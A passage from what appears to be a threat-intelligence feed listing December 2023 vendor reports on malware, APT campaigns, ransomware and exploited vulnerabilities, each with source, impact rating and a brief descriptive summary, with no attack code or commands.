- Cyfirma published a report describing a recent campaign using a malicious Word document with an embedded macro, a sophisticated threat orchestrated by the Sidewinder group, possibly targeting Nepalese government officials. The attack starts with a likely spear-phishing email delivering the malicious Word document. Upon opening it, the victim is manipulated into enabling macros, after which the embedded macro executes.
—
- Intel Source:
- Seqrite
- Intel Name:
- BATLOADER_2_X_Threat_of_Stealthy_Malware_Tactics
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Seqrite analysts analyzed an attack in which Batloader loads the payload, this time a stealer. Batloader is not a new malware family, but it is an emerging one.
—
- Intel Source:
- Thedfirreport
- Intel Name:
- Unveiling_a_Year_of_Covert_Operations_Profiling_a_Stealthy_Threat_Actor
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- This report provides a unique analysis by exploring data from the perspective of a threat actor’s exposed host. Discovered in an open directory, the amassed data spans over a year, unveiling a historical narrative of the threat actor’s operations. While primarily non-financially motivated, the actor strategically targeted an array of sectors, including government, defense contractors, finance, critical infrastructure, telecommunications, and escort services. Operating exclusively with open-source tools, the threat actor demonstrated a diverse skill set, employing active scanning, reconnaissance, and targeted exploits.
—
- Intel Source:
- Sophos
- Intel Name:
- Pig_Butchering_Scams_Deep_Dive_into_Cryptocurrency_Confidence_Schemes
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Cryptocurrency-based crime, particularly “pig butchering” scams, has evolved into sophisticated confidence schemes. Perpetrators use dating apps to establish relationships, leveraging generative AI to craft convincing messages. Investigating these scams reveals a complex web of interconnected domains and contract wallets, with scams evolving to avoid detection. The study unveils a multimillion-dollar network, emphasizing the need for public awareness and vigilance against the maturing tactics employed by organized crime rings in the cryptocurrency space.
Source:
https://news.sophos.com/en-us/2023/12/18/luring-with-love-defi-mining-scam-indepth/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- PikaBot_distributed_via_malicious_search_ads
- Date of Scan:
- 2023-12-15
- Impact:
- LOW
- Summary:
- Recently, researchers have noticed PikaBot, a new malware family that first showed up at the beginning of 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similar to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads
—
- Intel Source:
- Resecurity
- Intel Name:
- The_BianLian_White_Rabbit_and_Mario_ransomware_gangs_collaboration
- Date of Scan:
- 2023-12-15
- Impact:
- MEDIUM
- Summary:
- A ransomware attack on a financial services firm in the APAC region used tactics such as password spraying, BEC emails, and compromised third-party accounts. Evidence suggests the attack was conducted by a trinity of ransomware gangs, White Rabbit, Mario, and Ransomhouse, who threatened to report the victim to regulators if they failed to pay the ransom. The attack further highlights the vulnerability of VPNs to ransomware attackers.
—
- Intel Source:
- Trustwave
- Intel Name:
- Honeypot_Recon_for_MySQL_Malware_Infection
- Date of Scan:
- 2023-12-15
- Impact:
- LOW
- Summary:
- Trustwave took a closer look at the infection mechanisms of malware recently observed on MySQL servers, which leverages SQL commands to stealthily infiltrate, deploy, and activate malicious payloads, and at how these campaigns constantly evolve, changing behavior and adjusting infection techniques.
—
- Intel Source:
- Infoblox
- Intel Name:
- The_Lazarus_Group_Releases_KandyKorn
- Date of Scan:
- 2023-12-15
- Impact:
- MEDIUM
- Summary:
- KandyKorn is a highly sophisticated and dangerously formidable remote access trojan (RAT). Lazarus Group’s use of the KandyKorn malware tool highlights the group’s continued build-out of sophisticated tools and the growing dangers of their cyberattacks. Infoblox shared in their blog that threat actors have refined their techniques, causing most of the potential damage before malicious domains are identified and shared through open-source intelligence (OSINT) and the majority of commercial threat intel feeds.
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/dns-for-early-detection-lazarus-kandykorn/
—
- Intel Source:
- Securelist
- Intel Name:
- NKAbuse_a_new_multiplatform_threat
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- Securelist discovered a new multiplatform threat, NKAbuse. The malware uses NKN (New Kind of Network) technology for data exchange and has backdoor capabilities. Their analysis suggests the main target of NKAbuse is Linux desktops, but it can also infect MIPS and ARM systems and could pose a threat to IoT devices.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- OilRig_persistent_attacks
- Date of Scan:
- 2023-12-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity have analyzed a growing series of downloaders used by the OilRig cyber espionage group to maintain access to Israeli targets of special interest, in their blogpost published on 14 December 2023.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Recent_Gaza_Cybergang_activities
- Date of Scan:
- 2023-12-14
- Impact:
- MEDIUM
- Summary:
- SentinelLabs’ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.
Source:
https://www.sentinelone.com/labs/gaza-cybergang-unified-front-targeting-hamas-opposition/
—
- Intel Source:
- Checkpoint
- Intel Name:
- RHADAMANTHYS_V_0_5_0
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- Check Point Research team provided in their analysis a detailed view of agent modules, presenting their capabilities and implementation, focusing on how the stealer components are loaded and how they work. Rhadamanthys is an information stealer with a diverse set of modules and an interesting multilayered design.
Source:
https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/
—
- Intel Source:
- Lumen
- Intel Name:
- KV_Botnet_Investigation
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- The Black Lotus Labs team at Lumen Technologies is tracking a small office/home office (SOHO) router botnet that forms a covert data transfer network for advanced threat actors. They called this KV-botnet. The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises.
Source:
https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/
—
- Intel Source:
- Group-IB
- Intel Name:
- GambleForce_campaign_carries_SQL_injection_attacks
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- Group-IB’s Threat Intelligence team observed that since September 2023 the GambleForce threat actor has targeted more than 20 websites (government, gambling, retail, and travel) in Australia, China, Indonesia, the Philippines, India, South Korea, Thailand, and Brazil. After analyzing the toolset in detail, the analysts concluded that the tools were most likely associated with a threat actor executing one of the oldest attack methods: SQL injection.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_discovered_cluster_of_malicious_Python_projects
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- ESET Research discovered 116 malicious packages in PyPI, the official repository of software for the Python programming language, uploaded in 53 projects. The malware delivers a backdoor capable of remote command execution, exfiltration, and taking screenshots. The backdoor component is implemented for both Windows, in Python, and Linux, in Go.
Source:
https://www.welivesecurity.com/en/eset-research/pernicious-potpourri-python-packages-pypi/
—
- Intel Source:
- Seqrite
- Intel Name:
- Unraveling_Cerber_Ransomware
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- This analysis delves into the intricacies of Cerber ransomware, a malicious software identified in 2016. Cerber employs advanced techniques, such as custom-packing its payload, using mutex validation to prevent reinfection, and configuring Windows firewall rules for evading security tools. The ransomware communicates through a specific protocol, employs RSA and RC4 algorithms for encryption, and employs a self-deletion mechanism post-infection. To safeguard against Cerber and similar threats, the analysis recommends precautionary measures, including regular data backups, software updates, strong password usage, and vigilant email practices.
—
- Intel Source:
- Securelist
- Intel Name:
- FakeSG_RAT_Campaign_Akira_Ransomware_and_AMOS_Stealer_Insights
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- Securelist’s crimeware report examines three distinct threats: the FakeSG campaign delivering NetSupport RAT, the Akira ransomware affecting both Windows and Linux environments, and the AMOS stealer targeting macOS users. It covers FakeSG’s deceptive browser-update lures, Akira’s ransomware techniques resembling Conti, and the AMOS stealer’s rewrite from Go to C.
Source:
https://securelist.com/crimeware-report-fakesg-akira-amos/111483/
—
- Intel Source:
- Stairwell
- Intel Name:
- Kuiper_ransomware_analysis
- Date of Scan:
- 2023-12-13
- Impact:
- LOW
- Summary:
- At the beginning of this month, Stairwell researchers obtained a copy of a server suspected of being operated by the developers of the Kuiper ransomware. Their report gives an overview of the researchers’ findings and a technical analysis of the ransomware.
Source:
https://stairwell.com/resources/kuiper-ransomware-analysis-stairwells-technical-report/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- An_increase_of_malicious_ads_on_Google_searches_for_Zoom
- Date of Scan:
- 2023-12-13
- Impact:
- LOW
- Summary:
- This month, Malwarebytes researchers noticed a spike in malicious ads on Google searches for “Zoom”, the video conferencing software. Threat actors have been switching between keywords for software downloads such as “Advanced IP Scanner” or “WinSCP”, normally aimed at IT administrators. The researchers shared details of two cases: first, a new loader not previously mentioned publicly, called HiroshimaNukes; second, a campaign dropping the FakeBat loader in which the threat actor tracked victims via a panel new to Malwarebytes, called Hunting panel 1.40.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Mallox_Resurrected
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- SentinelOne analysts shared a summary and report of recent Mallox activity, explained the group’s initial access methods, and provided a high-level analysis of recent Mallox payloads. To date, the group continues to steal and leak a steady stream of enterprise data.
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_JetBrains_TeamCity_CVE_Globally
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- The FBI, U.S. CISA, U.S. NSA, the Polish Military Counterintelligence Service, CERT Polska (CERT.PL), and the UK’s NCSC concluded that Russian cyber actors APT29 (aka the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard) have been exploiting CVE-2023-42793 in JetBrains TeamCity at large scale over the past couple of months, targeting servers hosting the TeamCity software.
—
- Intel Source:
- Rewterz
- Intel Name:
- APT37_also_known_as_ScarCruft_or_Red_Eyes_activity
- Date of Scan:
- 2023-12-12
- Impact:
- MEDIUM
- Summary:
- APT37, aka ScarCruft or Red Eyes, is a state-sponsored cyber espionage group originating from North Korea. The group has been active for more than 10 years, with previous victims mostly in South Korea. It has now started attacks against entities in other countries, including Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and various parts of the Middle East. Malware associated with APT37 includes Goldbackdoor and RokRAT.
—
- Intel Source:
- Elastic
- Intel Name:
- The_updated_GULOADER_analysis
- Date of Scan:
- 2023-12-12
- Impact:
- LOW
- Summary:
- Elastic Security Labs researchers continue to monitor active threats such as GULOADER (aka CloudEyE), a highly evasive shellcode downloader that has been very active for years while under constant development. One of its recent changes is the addition of new exceptions to its Vectored Exception Handler (VEH) anti-analysis routine in a fresh campaign.
Source:
https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader
—
- Intel Source:
- X-Force
- Intel Name:
- The_delivery_of_the_ITG05_campaign_exclusive_Headlace_backdoor
- Date of Scan:
- 2023-12-12
- Impact:
- MEDIUM
- Summary:
- X-Force observed a campaign by ITG05, a likely Russian state-sponsored group, that uses lures related to the ongoing Israel-Hamas war to deliver a custom backdoor called HeadLace. “This new campaign is against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance, and diplomatic centers,” security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA4557_Targets_Recruiters_Directly_via_Email
- Date of Scan:
- 2023-12-12
- Impact:
- LOW
- Summary:
- Recently, Proofpoint observed TA4557 using both a new technique, in which the actor emails recruiters directly, and the older technique of applying to jobs posted on job boards to start the attack chain. In the direct-email chain, once the recipient responds to the initial email, the actor replies with a URL linking to an actor-controlled website posing as the candidate’s resume.
—
- Intel Source:
- PaloAlto
- Intel Name:
- A_series_of_related_attacks_against_organizations_with_new_tool_set
- Date of Scan:
- 2023-12-12
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers observed a series of apparently related attacks against organizations in the Middle East, Africa and the U.S. Unit 42 is sharing these results with the purpose of helping organizations defend against the tools observed here.
Source:
https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
—
- Intel Source:
- Group-IB
- Intel Name:
- New_Linux_Remote_Access_Trojan
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- The Group-IB Threat Intelligence unit shared insights on Krasue, a Linux Remote Access Trojan (RAT) used against organizations in Thailand. Krasue poses a severe risk to critical systems and sensitive data, as it can grant attackers remote access to the targeted network, and it embeds rootkits in its binary. Group-IB confirmed that Krasue was used against telecommunications companies, though it has likely been leveraged against organizations in other verticals as well. The team shared Krasue’s key characteristics, its functionality, its potential impact, and the measures organizations should take to defend against this evolving threat.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_Backdoor_Disguised_as_Data_Leak_Material_in_Targeted_Campaign
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has identified a targeted campaign distributing a malicious executable file disguised as personal data leak material. The malware functions as a backdoor, receiving obfuscated commands in XML format from threat actors. Although the final behavior could not be observed due to the closure of the command and control (C2) server, the malware involves the creation of obfuscated files, including legitimate doc files, to deceive users. The threat actor employs various scripts, such as Operator.jse and WindowsHotfixUpdate.ps1, creating a complex execution chain
—
- Intel Source:
- SentinelOne
- Intel Name:
- Sandman_APT
- Date of Scan:
- 2023-12-11
- Impact:
- MEDIUM
- Summary:
- SentinelLabs, Microsoft, and PwC threat intelligence researchers shared the joint report with the information on the Sandman APT cluster. They saw links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor – STORM-0866/Red Dev 40. Their report included victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.
Source:
https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Editbot_Stealer_Spreads
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- Cyble researchers observed a WinRAR archive file on VirusTotal with minimal detection. Their analysis indicated that it is part of a new campaign targeting social media users. The campaign is a multi-stage attack in which each phase has a particular role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system.
Source:
https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/
—
- Intel Source:
- Talos
- Intel Name:
- Operation_Blacksmith
- Date of Scan:
- 2023-12-11
- Impact:
- MEDIUM
- Summary:
- This month Cisco Talos researchers discovered a new Lazarus Group campaign, “Operation Blacksmith”, using three new DLang-based malware families, two of which are remote access trojans (RATs); one of them uses Telegram bots and channels as its command and control (C2) medium. Talos tracks the Telegram-based RAT as “NineRAT”, the non-Telegram-based RAT as “DLRAT”, and the DLang-based downloader as “BottomLoader”.
Source:
https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
—
- Intel Source:
- Lab52
- Intel Name:
- Mustang_Panda_s_PlugX_new_variant_attacks
- Date of Scan:
- 2023-12-11
- Impact:
- LOW
- Summary:
- The Lab52 team analyzed a campaign in which attackers deployed a new variant of the PlugX malware. The details and the various artifacts used show many similarities with the SmugX campaign, attributed to the threat actors Red Delta and Mustang Panda, allegedly linked to the Chinese government. The analysts observed that these attacks target the Taiwanese government and diplomats.
—
- Intel Source:
- Trendmicro
- Intel Name:
- Unraveling_the_Complex_AsyncRAT_Infection_Chain
- Date of Scan:
- 2023-12-11
- Impact:
- MEDIUM
- Summary:
- Trend Micro’s Managed XDR (MxDR) team has conducted an in-depth analysis of the AsyncRAT (Remote Access Tool) infection chain, revealing the tool’s sophisticated capabilities, including keylogging and remote desktop control. The blog post explores the misuse of the legitimate Microsoft process aspnet_compiler.exe by malicious actors, shedding light on evolving adversary tactics. The investigation details the entire timeline of events, from the initial download to the establishment of command-and-control connections. The analysis highlights AsyncRAT’s adaptability across diverse attack vectors, including phishing campaigns and ransomware infections.
—
- Intel Source:
- Fortinet
- Intel Name:
- MrAnon_Stealer_Spreads_via_Email
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- This month FortiGuard Labs discovered an email phishing campaign using misleading booking information to lure victims into clicking on a malicious PDF file. The PDF downloads and runs a PowerShell script that fetches the MrAnon Stealer malware. MrAnon Stealer is a Python-based information stealer packed with cx-Freeze to evade detection; it steals victims’ credentials, system information, browser sessions, and cryptocurrency extensions.
—
- Intel Source:
- Cyberint
- Intel Name:
- Israel_Hamas_vs_Ukraine_Russia_cyber_war
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- The conflict that broke out between Israel and Hamas on the morning of October 7 has not only engaged physical battlegrounds but has also drawn multiple threat actors into cyberspace, as has the Russian-Ukrainian conflict. Cyberint shared a detailed analysis of the cyber activity observed during these two wars.
Source:
https://cyberint.com/blog/research/israel-hamas-vs-ukraine-russia-war/
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_creation_by_Kimsuky_Group_using_AutoIt
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- ASEC is constantly following the Kimsuky group’s attacks using LNK-type malware and studying their attack cases. After gaining initial access, the Kimsuky group installs remote control malware to control the infected system. Kimsuky’s malware also includes open-source or commercial malware such as XRat, HVNC, Amadey, and Metasploit Meterpreter. This time ASEC analyzed Amadey and RftRAT, which were recently found being distributed.
—
- Intel Source:
- Esentire
- Intel Name:
- The_exploits_for_Citrix_Bleed_are_in_the_wild
- Date of Scan:
- 2023-12-09
- Impact:
- HIGH
- Summary:
- Two months ago, the eSentire team received alerts which, after investigation, were tied to a LockBit ransomware attack. The first indicators included Rclone activity and connections to the known malicious C2 domain megapackup[.]com. The eSentire Threat Response Unit continued its investigation of this malicious activity and concluded with confidence that the threat actor gained initial access via the Citrix Bleed vulnerability (CVE-2023-4966) affecting Citrix NetScaler ADC and NetScaler Gateway, which allows attackers to bypass authentication by retrieving session tokens. Exploits for Citrix Bleed are available in the wild, and the vulnerability is being actively discussed on Russian hacking forums.
Source:
https://www.esentire.com/blog/citrix-bleed-vulnerability-a-gateway-to-lockbit-ransomware
—
- Intel Source:
- PaloAlto
- Intel Name:
- Fighting_Ursa_two_malicious_campaigns
- Date of Scan:
- 2023-12-09
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have observed the group Fighting Ursa (APT28) exploiting the Microsoft Outlook vulnerability CVE-2023-23397, initially as a zero-day, over the past 20 months to target at least 30 organizations within 14 nations that are of likely strategic intelligence value to the Russian government and its military. The group conducted at least two campaigns with this vulnerability that have been made public.
Source:
https://unit42.paloaltonetworks.com/russian-apt-fighting-ursa-exploits-cve-2023-233397/
—
- Intel Source:
- Esentire
- Intel Name:
- DanaBot_trojan_deploying_IcedID
- Date of Scan:
- 2023-12-09
- Impact:
- LOW
- Summary:
- Last month, the eSentire Threat Response analysts again observed DanaBot, a banking Trojan known for stealing banking credentials and personal information and for its hVNC capability. This malware was being used to deliver IcedID, another banking Trojan.
Source:
https://www.esentire.com/blog/danabots-latest-move-deploying-icedid
—
- Intel Source:
- Esentire
- Intel Name:
- Exploitation_of_Qlik_Sense_servers
- Date of Scan:
- 2023-12-09
- Impact:
- LOW
- Summary:
- eSentire has seen multiple instances of threat actors exploiting vulnerabilities in Qlik Sense to gain initial access to victim organizations. Qlik Sense is a data analytics platform; there is a high probability that unpatched, internet-facing Qlik Sense servers will be targeted in an ongoing campaign.
Source:
https://www.esentire.com/security-advisories/qlik-sense-exploitation
—
- Intel Source:
- Sucuri
- Intel Name:
- The_evolution_of_the_ATMZOW_skimmer
- Date of Scan:
- 2023-12-09
- Impact:
- LOW
- Summary:
- The Sucuri research team shared a deep look into recent Google Tag Manager containers used in e-commerce malware, examined some newer forms of obfuscation used in the malicious code, and tracked the evolution of the ATMZOW skimmer linked to widespread Magento website infections since 2015.
—
- Intel Source:
- Domaintools
- Intel Name:
- Merry_Phishmas_phishing_activities
- Date of Scan:
- 2023-12-08
- Impact:
- LOW
- Summary:
- During the holidays, DomainTools is warning the public to be extremely wary of USPS package redelivery phishing attacks. DomainTools is monitoring several USPS phishing campaigns, including activity that aligns with known tactics, techniques, and procedures of the China-based “Chenlun” phishing actor and their affiliated groups.
—
- Intel Source:
- Splunk
- Intel Name:
- Detailed_analysis_of_PlugX_Malware
- Date of Scan:
- 2023-12-07
- Impact:
- LOW
- Summary:
- The Splunk research team shared their deep analysis of a PlugX variant, covering the malicious payload, its tactics, and its impact, including PlugX .DAT payload extraction, PlugX .CFG decryption, a PlugX extractor tool, and PlugX analysis.
—
- Intel Source:
- Patchstack
- Intel Name:
- A_huge_spike_scale_phishing_campaign
- Date of Scan:
- 2023-12-07
- Impact:
- LOW
- Summary:
- The Patchstack team has been keeping an eye on a large-scale phishing campaign with several variants of phishing emails circulating that notify users of a new security vulnerability in their WordPress website, supposedly a “Remote Code Execution (RCE)” vulnerability “CVE-2023-45124”, and ask them to patch right away using a “Patch created by the WordPress Team”. The email is fake, and the plugin users are asked to download and install is malicious; it infects the website with a backdoor and a malicious administrator account.
—
- Intel Source:
- CISA, Microsoft
- Intel Name:
- Star_Blizzard_increases_sophistication_and_evasion_in_ongoing_attacks
- Date of Scan:
- 2023-12-07
- Impact:
- HIGH
- Summary:
- CISA, the UK NCSC, the Australian Signals Directorate’s Australian Cyber Security Centre, the Canadian Centre for Cyber Security, the New Zealand National Cyber Security Centre, and the U.S. NSA, FBI, and Cyber Command Cyber National Mission Force (CNMF) shared a joint security warning, “Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns”. This threat actor, formerly known as SEABORGIUM and also tracked as Callisto Group, TA446, COLDRIVER, TAG-53 and BlueCharlie, continues to use spear-phishing campaigns against targeted organizations and individuals in the UK and other geographical areas of interest for information-gathering activity.
Source:
https://www.cisa.gov/news-events/alerts/2023/12/07/cisa-and-international-partners-release-advisory-russia-based-threat-actor-group-star-blizzard
https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/
—
- Intel Source:
- Securelist
- Intel Name:
- New_Trojan_BlueNoroff_loader_attacking_macOS_users
- Date of Scan:
- 2023-12-06
- Impact:
- LOW
- Summary:
- Securelist uncovered a new variety of malicious loader that attacks macOS, suspected to be tied to the BlueNoroff APT group and its known RustBucket campaign. The threat actor is known to attack financial organizations whose activity is related to cryptocurrency, as well as individuals who hold crypto assets or take an interest in the subject.
Source:
https://securelist.com/bluenoroff-new-macos-malware/111290/
—
- Intel Source:
- Securelist
- Intel Name:
- New_macOS_Trojan_Proxy_piggybacking_on_cracked_software
- Date of Scan:
- 2023-12-06
- Impact:
- LOW
- Summary:
- Securelist researchers identified several cracked applications spread by illegal websites and loaded with a Trojan-Proxy. Attackers use this malware to make money by building a proxy server network or to perform illegal activities on behalf of the victim: launching attacks on websites, companies, and individuals, and buying guns, drugs, and other illicit goods.
Source:
https://securelist.com/trojan-proxy-for-macos/111325/
—
- Intel Source:
- Unit42
- Intel Name:
- Unidentified_Infostealer_Dec5
- Date of Scan:
- 2023-12-06
- Impact:
- LOW
- Summary:
- A loader EXE leads to unidentified malware whose C2 uses encoded/encrypted TCP traffic to 91.92.120[.]119.
Source:
https://twitter.com/Unit42_Intel/status/1732411660013273387
https://www.linkedin.com/posts/unit42_malwaretraffic-timelythreatintel-unit42threatintel-activity-7138177279964151809–S66/
—
- Intel Source:
- ASEC
- Intel Name:
- WSF_Script_Variant_of_AsyncRAT_Malware_Campaign
- Date of Scan:
- 2023-12-06
- Impact:
- MEDIUM
- Summary:
- A recent analysis by the AhnLab Security Emergency Response Center (ASEC) reveals a shift in the distribution method of the AsyncRAT malware. Previously distributed through files with the .chm extension, the malware now uses the WSF script format, found in compressed (.zip) files distributed via email URLs. The WSF script, when executed, triggers a sequence of events, downloading and running Visual Basic scripts that ultimately execute the AsyncRAT malware. The campaign employs fileless attack techniques, bypassing UAC and utilizing various scripts to maintain persistence, collect system information, and exfiltrate data.
—
- Intel Source:
- Wordfence
- Intel Name:
- WordPress_Phishing_Campaign_Targets_Users_with_Fake_Security_Patch_Plugin
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Wordfence Threat Intelligence Team has identified a phishing campaign targeting WordPress users, falsely warning of a non-existent Remote Code Execution vulnerability (CVE-2023-45124). The phishing email instructs users to download a fake “Patch” plugin, leading to a malicious backdoor. The plugin adds an administrator user (wpsecuritypatch) and communicates with a command and control domain. The separate backdoor provides multiple forms of access, enabling full control over the WordPress site and the server’s web user account.
—
- Intel Source:
- Cyble
- Intel Name:
- Return_of_the_Banking_Trojan_TrickMo
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Cyble researchers discovered a new variant of the TrickMo banking trojan via VirusTotal Intelligence back in September 2023. This variant demonstrated more advanced functionality compared with the last analysis, employing overlay injection techniques to extract credentials from targeted applications instead of relying on screen recording, as observed in the first iteration.
Source:
https://cyble.com/blog/trickmos-return-banking-trojan-resurgence-with-new-features/
—
- Intel Source:
- CuratedIntel
- Intel Name:
- Global_credit_card_information_campaigns_targeting_users_in_different_services
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Tas and Curated Intel researchers shared their discovery of a newly observed phishing method that uses the chat functionality of multiple web and mobile applications. This phishing campaign introduced a novel TTP of abusing the chat functionality of postal, reservation, and e-commerce services.
Source:
https://www.curatedintel.org/2023/12/curated-intel-threat-report-multi.html
—
- Intel Source:
- Cyberint
- Intel Name:
- Lumma_Stealer_threat_in_the_expanding_infostealers_Ecosystem
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Lumma Stealer, identified in August 2022, continues to evolve as a prominent InfoStealer. Orchestrated by threat actor “Shamel,” it targets crypto users, extracting sensitive data through various methods. Priced at $140-$160 per month on the dark web, Lumma Stealer poses a significant risk with potential financial losses, compromised security, and privacy breaches. Its impact extends to organizational reputational damage. Businesses are urged to stay vigilant and implement robust cybersecurity measures against this evolving threat.
Source:
https://cyberint.com/blog/research/the-lumma-stealer-infostealer-the-details/
—
- Intel Source:
- Cybereason
- Intel Name:
- DJvu_Variant_Xaro_Delivered_via_Freeware_Loader
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- The Cybereason Security Services Team is investigating incidents involving a variant of the DJvu ransomware named “Xaro,” delivered through loaders masquerading as freeware. This attack aims at data exfiltration, information theft, and file encryption for ransom. Notable observations include the .xaro extension appended to affected files and a “shotgun” infection approach, deploying various malware strains alongside Xaro.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA422_s_Dedicated_Exploitation
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Since mid-2023, Proofpoint researchers have observed regular TA422 (APT28) phishing activity in which the threat actor leveraged patched vulnerabilities, including CVE-2023-23397, to send, at times, high-volume campaigns to targets in Europe and North America. TA422 used the vulnerabilities for initial access against government, aerospace, education, finance, manufacturing, and technology sector targets, likely to either disclose user credentials or initiate follow-on activity.
—
- Intel Source:
- Cyfirma
- Intel Name:
- DanaBot_Stealer
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Cyfirma analysts provided a comprehensive analysis of the information stealer DanaBot, presenting a thorough examination of its functionality and capabilities. DanaBot is a stealthy and versatile malware that infiltrates computers to steal valuable information for monetization. Unlike ransomware, which demands immediate payment, DanaBot operates discreetly, prioritizing long-term persistence and the theft of sensitive data.
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_Adobe_ColdFusion_or_Initial_Access_to_Government_Servers
- Date of Scan:
- 2023-12-05
- Impact:
- HIGH
- Summary:
- CISA has released a Cybersecurity Advisory confirming the exploitation of CVE-2023-26360 by unknown threat actors at a Federal Civilian Executive Branch (FCEB) agency. This vulnerability is an improper access control issue impacting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). Exploitation of this CVE can result in arbitrary code execution.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a
—
- Intel Source:
- CISA
- Intel Name:
- Exploit_of_PLCs_in_US_Water_and_Wastewater_Systems_Facilities
- Date of Scan:
- 2023-12-05
- Impact:
- HIGH
- Summary:
- The FBI, CISA, NSA, EPA, and the Israel National Cyber Directorate released a joint Security Advisory on continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat cyber actors. The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs).
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a
—
- Intel Source:
- Trellix
- Intel Name:
- Unveiling_Akira_Ransomware
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Discovered in 2023, the Akira ransomware employs a double extortion scheme, targeting diverse sectors with victims primarily in the United States. Using various initial access methods, including multi-factor authentication exploitation and spear phishing, the ransomware exfiltrates data, encrypts files with ChaCha, and demands payment for decryption and data protection.
Source:
https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_group_Trigona_operation
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- Trigona threat actors were observed leveraging the vulnerability CVE-2021-40539. Trigona also uses compromised accounts, obtaining access from network access brokers. Based on a combination of Trend’s open-source intelligence (OSINT) research and investigation of the leak site, Trigona ransomware compromised 33 organizations within a short period in North America and Europe; enterprises in Asia-Pacific, Latin America, and the Caribbean were also compromised.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-trigona
—
- Intel Source:
- Perception point
- Intel Name:
- Multi_Layered_Invoice_Campaign_Unveils_Stealthy_LUMMA_InfoStealer_Attack
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
